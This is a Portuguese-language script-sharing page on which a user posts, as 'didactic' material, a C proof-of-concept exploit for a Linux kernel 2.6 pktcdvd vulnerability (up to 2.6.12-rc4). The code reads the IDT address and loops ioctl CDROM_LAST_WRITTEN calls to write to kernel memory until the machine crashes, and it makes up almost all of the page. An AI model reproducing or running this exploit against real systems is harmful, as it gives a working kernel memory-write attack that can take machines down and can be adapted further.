Exploit para kernel 2.6.12-rc4

Publicado por Leonidas Romualdo 28/02/2009

[ Hits: 6.373 ]

Homepage: http://br.linkedin.com/in/leonidasromualdo

Download xpl kernel 2.6.cpp




Este é um script tipo xpl que testa a vunerabilidade do kernel 2.6.

Muito bom para fins de didáticos .. ^^

  



Esconder código-fonte

/* pktcdvd_dos.c proof-of-concept 
* This is only a lame POC which will crash the machine, no root shell here. 
* --- alert7 
* 2005-5-15 
* the vulnerability in 2.6 up to and including 2.6.12-rc4 
* 
* gcc -o pktcdvd_dos pktcdvd_dos.c 
* 
* NOTE: require user can read pktcdvd block device 
*/ 


#define _GNU_SOURCE 
#include <stdio.h> 
#include <stdlib.h> 
#include <errno.h> 
#include <string.h> 
#include <unistd.h> 
#include <fcntl.h> 
#include <signal.h> 
#include <paths.h> 
#include <grp.h> 
#include <setjmp.h> 
#include <stdint.h> 
#include <sys/mman.h> 
#include <sys/ipc.h> 
#include <sys/shm.h> 
#include <sys/ucontext.h> 
#include <sys/wait.h> 
#include <asm/ldt.h> 
#include <asm/page.h> 
#include <asm/segment.h> 
#include <linux/unistd.h> 
#include <linux/linkage.h> 
#include <sys/types.h> 
#include <sys/stat.h> 
#include <fcntl.h> 
#include <linux/sysctl.h> 
#include <linux/cdrom.h> 


#define __NR_sys_ioctl __NR_ioctl 



#define PKTCDVDDEVICE "/dev/hdc" 


static inline _syscall3(int, sys_ioctl, int ,fd,int, cmd,unsigned long, arg); 


struct idtr { 
unsigned short limit; 
unsigned int base; 
} __attribute__ ((packed)); 


unsigned int get_addr_idt() { 
struct idtr idtr; 
asm("sidt %0" : "=m" (idtr)); 
return idtr.base; 
} 
struct desc_struct { 
unsigned long a,b; 
}; 
int main(int argc,char **argv) 
{ 
unsigned int ptr_idt; 
int iret ; 
int fd; 


printf("[++]user stack addr %p \n",&ptr_idt); 
if ( ( (unsigned long )&ptr_idt >>24)==0xfe){ 
printf("[--]this kernel patched 4g/4g patch,no vulnerability!\n"); 
return -1; 
} 


ptr_idt=get_addr_idt(); 
printf("[++]IDT Addr %p \n",ptr_idt); 



fd = open(PKTCDVDDEVICE,O_RDONLY); 
if (fd ==-1) 
{ 
printf("[--]"); 
fflush(stdout); 
perror("open"); 
return -1; 
} 

unsigned long WriteTo ; 


if ( (ptr_idt>>24)==0xc0){ 
printf("[++]this OS in Real Linux\n"); 
WriteTo= ptr_idt; 
}else{ 
printf("[++]this OS maybe in VMWARE\n"); 
WriteTo = 0xc0100000; 
} 


printf("[++]call sys_ioctl will crash machine\n"); 
fflush(stdout); 

int loopi; 
for (loopi=0;loopi<0x100000 ;loopi++ ) 
{ 
printf("[++]will write data at 0x%x\n",WriteTo+loopi*4); 
fflush(stdout); 
iret = sys_ioctl(fd, 
CDROM_LAST_WRITTEN, 
WriteTo+loopi*4); 
if (iret ==-1) 
{ 
printf("[--]"); 
fflush(stdout); 
perror("ioctl"); 
//if in VMWARE ,rewrite ptr_idt adress will failed 
printf("[--]still aliving\n"); 
close(fd); 
return -1; 
} 
} 
close(fd); 
return 0; 
} 

Scripts recomendados

Criptografia

Cifra de César!

Função Senhas C/C++

Criptografar um Arquivo de Texto por cifra de Transposição

USER ID (verificador)


  

Comentários

Nenhum comentário foi encontrado.


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts